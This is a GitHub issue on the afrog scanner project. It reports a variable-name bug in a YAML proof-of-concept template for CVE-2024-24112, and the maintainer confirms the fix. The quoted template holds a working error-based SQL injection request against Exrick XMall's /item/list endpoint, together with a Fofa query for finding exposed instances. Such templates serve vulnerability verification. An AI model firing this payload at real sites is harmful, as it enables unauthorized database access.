zan8in / afrog

A Security Tool for Bug Bounty, Pentest and Red Teaming.
MIT License
3.42k stars 385 forks source link

CVE-2024-24112 PoC有误 #110

Closed scarleast closed 8 months ago

scarleast commented 8 months ago

expression中,md5运算的变量应该为randstr,poc中为rand。

id: CVE-2024-24112

info:
  name: Exrick XMall 开源商城 SQL注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="XMall-后台管理系统"
  reference:
    - https://mp.weixin.qq.com/s/HqVQrUr6iRv94BmrVd_gOw
  tags: cve,cve2024,sqli
  created: 2024/02/21

set:
  randstr: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randstr}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(randstr))))
expression: r0()
zan8in commented 8 months ago

感谢,已经修复,并更新到Github